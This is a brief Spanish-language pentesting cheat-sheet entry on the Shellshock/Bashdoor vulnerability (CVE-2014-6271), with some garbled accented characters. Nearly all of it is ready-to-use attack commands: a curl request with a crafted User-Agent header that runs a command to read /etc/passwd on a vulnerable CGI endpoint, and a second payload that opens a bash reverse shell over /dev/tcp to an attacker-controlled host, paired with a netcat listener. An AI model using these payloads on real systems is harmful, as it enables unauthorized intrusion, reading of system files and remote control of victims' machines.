Shellshock / Bashdoor (CVE-2014-6271)

Verificaci贸n de vulnerabilidad Shellshock / Bashdoor.

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://<target>/cgi-bin/<vulnerable>

Reverse shell.

# M谩quina atacante
nc -lvnp <listen-port>
# M谩quina victima
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" http://<target>/cgi-bin/<vulnerable>
AnteriorHeartbleed (CVE-2014-0160)SiguienteEternalBlue (CVE-2017-0144 / MS17-010)

脷ltima actualizaci贸n

驴Te fue 煤til?